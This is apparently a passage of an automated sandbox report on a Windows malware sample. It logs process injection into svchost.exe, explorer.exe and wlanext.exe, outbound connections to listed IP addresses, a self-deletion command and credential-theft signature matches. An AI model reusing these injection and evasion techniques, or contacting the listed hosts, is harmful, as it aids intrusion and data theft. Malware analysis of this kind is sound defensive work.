          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA24 mov eax, dword ptr fs:[00000030h]1_2_02F6CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EA2E mov eax, dword ptr fs:[00000030h]1_2_02F5EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCA11 mov eax, dword ptr fs:[00000030h]1_2_02FBCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EBFC mov eax, dword ptr fs:[00000030h]1_2_02F5EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]1_2_02FBCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]1_2_02FDEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004A80 mov eax, dword ptr fs:[00000030h]1_2_03004A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2CB7E mov eax, dword ptr fs:[00000030h]1_2_02F2CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB40 mov eax, dword ptr fs:[00000030h]1_2_02FFAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8B42 mov eax, dword ptr fs:[00000030h]1_2_02FD8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]1_2_02FFA8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]1_2_02F5E8C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC89D mov eax, dword ptr fs:[00000030h]1_2_02FBC89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30887 mov eax, dword ptr fs:[00000030h]1_2_02F30887
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60854 mov eax, dword ptr fs:[00000030h]1_2_02F60854
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F42840 mov ecx, dword ptr fs:[00000030h]1_2_02F42840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov ecx, dword ptr fs:[00000030h]1_2_02F52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A830 mov eax, dword ptr fs:[00000030h]1_2_02F6A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC810 mov eax, dword ptr fs:[00000030h]1_2_02FBC810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]1_2_02FBE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F649D0 mov eax, dword ptr fs:[00000030h]1_2_02F649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]1_2_02FFA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC69C0 mov eax, dword ptr fs:[00000030h]1_2_02FC69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov esi, dword ptr fs:[00000030h]1_2_02FB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC97C mov eax, dword ptr fs:[00000030h]1_2_02FBC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov eax, dword ptr fs:[00000030h]1_2_02F7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov edx, dword ptr fs:[00000030h]1_2_02F7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov eax, dword ptr fs:[00000030h]1_2_02F7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0946 mov eax, dword ptr fs:[00000030h]1_2_02FB0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB892A mov eax, dword ptr fs:[00000030h]1_2_02FB892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC892B mov eax, dword ptr fs:[00000030h]1_2_02FC892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC912 mov eax, dword ptr fs:[00000030h]1_2_02FBC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28918 mov eax, dword ptr fs:[00000030h]1_2_02F28918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28918 mov eax, dword ptr fs:[00000030h]1_2_02F28918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE908 mov eax, dword ptr fs:[00000030h]1_2_02FAE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE908 mov eax, dword ptr fs:[00000030h]1_2_02FAE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68EF5 mov eax, dword ptr fs:[00000030h]1_2_02F68EF5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36EE0 mov eax, dword ptr fs:[00000030h]1_2_02F36EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36EE0 mov eax, dword ptr fs:[00000030h]1_2_02F36EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36EE0 mov eax, dword ptr fs:[00000030h]1_2_02F36EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36EE0 mov eax, dword ptr fs:[00000030h]1_2_02F36EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]1_2_02FCAEB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]1_2_02FCAEB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]1_2_02FBCEA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]1_2_02FBCEA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]1_2_02FBCEA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2AE90 mov eax, dword ptr fs:[00000030h]1_2_02F2AE90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2AE90 mov eax, dword ptr fs:[00000030h]1_2_02F2AE90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2AE90 mov eax, dword ptr fs:[00000030h]1_2_02F2AE90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004F68 mov eax, dword ptr fs:[00000030h]1_2_03004F68
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F62E9C mov eax, dword ptr fs:[00000030h]1_2_02F62E9C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F62E9C mov ecx, dword ptr fs:[00000030h]1_2_02F62E9C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36E71 mov eax, dword ptr fs:[00000030h]1_2_02F36E71
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0E7F mov eax, dword ptr fs:[00000030h]1_2_02FB0E7F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0E7F mov eax, dword ptr fs:[00000030h]1_2_02FB0E7F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0E7F mov eax, dword ptr fs:[00000030h]1_2_02FB0E7F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6E20 mov eax, dword ptr fs:[00000030h]1_2_02FC6E20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6E20 mov eax, dword ptr fs:[00000030h]1_2_02FC6E20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6E20 mov ecx, dword ptr fs:[00000030h]1_2_02FC6E20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004FE7 mov eax, dword ptr fs:[00000030h]1_2_03004FE7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28E1D mov eax, dword ptr fs:[00000030h]1_2_02F28E1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5AE00 mov eax, dword ptr fs:[00000030h]1_2_02F5AE00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5AE00 mov eax, dword ptr fs:[00000030h]1_2_02F5AE00
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00EFA66C
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EE81AC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE8189 SetUnhandledExceptionFilter,0_2_00EE8189
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00DE0063 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00DE0063
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00DDFD20 SetUnhandledExceptionFilter,4_2_00DDFD20

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 45.38.60.47 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.40.196 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.252.111.49 80Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3052Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: DD0000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2373008Jump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFB106 LogonUserW,0_2_00EFB106
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00EC3D19
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0411C SendInput,keybd_event,0_2_00F0411C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F074E7 mouse_event,0_2_00F074E7
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00EFA66C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F071FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00F071FA
          Source: file.exe, explorer.exe, 00000002.00000000.1666389880.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1660320721.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658671856.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.1658671856.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: file.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
          Source: explorer.exe, 00000002.00000000.1658108503.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2686435138.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000002.00000000.1658671856.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000E.00000002.2919550460.0000000004CFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndI
          Source: explorer.exe, 00000002.00000000.1658671856.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE65C4 cpuid 0_2_00EE65C4
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00F1091D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3B340 GetUserNameW,0_2_00F3B340
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00EF1E8E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EDDDC0
          Source: file.exe, 00000000.00000003.1644842933.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1644225469.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1645099426.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1645532593.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1645743878.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643659977.000000000115C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1645459259.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1644652528.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1654895477.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1644498449.000000000118F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
